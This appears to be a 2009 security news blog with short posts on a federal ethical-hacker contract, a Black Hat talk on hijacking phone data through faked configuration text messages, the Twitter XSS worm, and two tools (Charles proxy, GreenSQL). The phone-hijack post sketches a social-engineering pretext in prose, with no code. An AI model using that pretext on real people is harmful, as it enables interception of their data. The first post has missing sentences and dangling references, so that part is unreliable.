Apr 20 2009

Wanted: Computer Hackers – To Help Government

WASHINGTON – Wanted: Computer hackers.

Federal authorities aren’t looking to prosecute them, but to pay them to secure the nation’s networks.

General Dynamics Information Technology put out an ad last month on behalf of the Homeland Security Department seeking someone who could “think like the bad guy.” Applicants, it said, must understand hackers’ tools and tactics and be able to analyze Internet traffic and identify vulnerabilities in the federal systems.

With warnings that the U.S. is ill-prepared for a cyberattack, the White House conducted a 60-day study of how the government can better manage and use technology to protect everything from the electrical grid and stock markets to tax data, airline flight systems, and nuclear launch codes.

President Barack Obama appointed a former Bush administration aide, Melissa Hathaway, to head the effort, and her report was delivered Friday, the White House said.

U.S. computer networks, including those at the Pentagon and other federal agencies, are under persistent attack, ranging from nuisance hacking to more nefarious assaults, possibly from other nations, such as China.

Just last week, spies had hacked into the U.S. electric grid and left behind computer programs that would let them disrupt service. The intrusions were discovered after electric companies gave the government permission to audit their systems

Adm. Mike Mullen, chairman of the Joint Chiefs of Staff. Pentagon officials say they spent more than $100 million in the last six months responding to and repairing damage from cyberattacks and other computer network problems.

Short said the $60 million, four-year contract with US-CERT uses the ethical hackers to analyze threats to the government’s computer systems and develop ways to reduce vulnerabilities.

Source: Yahoo News

Apr 18 2009

Hijacking Mobile Phone Data

Mobile HijackResearchers claim to be able to hijack cell-phone data connections.

In a presentation at Black Hat Europe, a computer-security conference in Amsterdam, a group of researchers claimed to have found a way to hijack the data sent to and from mobile phones. The researchers say that the attack might be used to glean passwords or to inject malicious software onto a device.

The new attack relies on a protocol that allows mobile operators to give a device the proper settings for sending data via text message, according to Roberto Gassira, Cristofaro Mune, and Roberto Piccirillo, security researchers for Mobile Security Lab [www.mseclab.com], a consulting firm based in Italy. By faking this type of text message, according to the protocol an attacker can create his own settings for the victim’s device. This would allow him to, for example, reroute data sent from the phone via a server that he controls. The researchers say that the technique should work on any handset that supports the protocol, as long as the attacker knows which network the victim belongs to and the network does not block this kind of message.

Some trickery is required to make the attack work, however. Ordinarily, to transfer settings to a device remotely, a mobile operator will first send a text message containing a PIN code. The operator will then send the message to reconfigure the phone. In order to install the new settings, the user must first enter the PIN.

So an attacker would need to convince a victim to enter a PIN and accept the malicious settings sent to the phone. But Gassira, Mune and Piccirillo believe that this shouldn’t be too difficult. The attacker could send text messages from a name such as “service provider” or “message configuration,” suggesting that changes to the device’s settings are needed due to a network error. For many handsets, they say, the results of the configuration aren’t shown to the user, giving the victim little chance to notice that anything is amiss.

Source: Technology Review

Apr 18 2009

Charles Web Debugging Proxy

Charles ProxyCharles is an HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP traffic between their machine and the Internet. This includes requests, responses and the HTTP headers (which contain the cookies and caching information).

Charles can act as a man-in-the-middle for HTTP/SSL communication, enabling you to debug the content of your HTTPS sessions.

Charles simulates modem speeds by effectively throttling your bandwidth and introducing latency, so that you can experience an entire website as a modem user might (bandwidth simulator).

Charles is especially useful for Adobe Flash developers as you can view the contents of LoadVariables, LoadMovie and XML loads. Charles also has native support for Flash Remoting (AMF0 and AMF3).

Charles is also useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables you to see the actual XML that is flowing between the client and the server. Charles natively supports JSON, JSON-RPC and SOAP; displaying each in a simplified tree format for easy viewing and debugging.

Charles will autoconfigure your browser’s proxy settings on the following browsers:

* IE (Windows system proxy settings)
* Firefox
* Safari (Mac OS X or Windows system proxy settings)

Supported Platforms:
* Windows
* Mac OS X
* Linux/Unix

Latest Release: Version 3.3.1

Download: http://www.charlesproxy.com/download.php

Apr 14 2009

Twitter Attacked by Powerful Worm

Twitter, the 3rd biggest social network after Facebook and Myspace was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby trapped user profiles.

The worm attacks began early Saturday morning and were the result of XSS, or cross-site scripting, bugs in the Twitter service. They caused those who viewed the profiles of infected users to post tweets promoting a site called StalkDaily.com. Victim profiles were then altered to include malicious javascript that infected new marks. Over the next 36 hours, at least three similar worms made the rounds, causing Twitter administrators to delete more than 10,000 tweets.

Twitter’s inability to quickly contain the mess prompted some security watchers to criticize Twitter for not being more on top of it. According to this postmortem from the Dcortesi blog, the attacks exploited gaping holes that allowed users to insert tags in the URLs of Twitter users’ profile pages that called malicious javascript from third-party web servers.

As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.

Twitter’s security team was able to block the attack for a while, but a new assault that made use of “mildly obfuscated” code soon defeated the countermeasure, raising the possibility that it was based on the detection of attack signatures rather than fixing the underlying bug that allowed the XSS vulnerability in the first place.

Source: The Register

Apr 10 2009

GreenSQL – SQL Database Firewall

GreenSQLGreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc). GreenSQL is distributed under the GPL license.

GreenSQL-FW: 1.0.0 Released :
GreenSQL team is ready to present new version of GreenSQL. GreenSQL intercept SQL commands being sent to MySQL, checks them, and then either halts the query or passes it on to MySQL proper. Then it returns the query results to the calling application. Currently only MySQL database is supported. This release includes a new version of firewall and a management application.

This is a major application release geared towards application stability, ease of use, performance increase and elimination of bugs.

This release includes a number of pre-build packages of popular operating systems. Supply packages for CentOS, Fedora, Mandriva, Red Hat, openSUSE, Ubuntu, and Debian.

List of changes:
1. Code optimization.
2. Fixed a number of bugs related to networking connectivity.
3. Extended support for specific MySQL SQL commands.
4. Ease of use.

New management version is numbered 0.5.0
New firewall version is numbered 1.0.0

Home: http://www.greensql.net

Download: http://www.greensql.net/download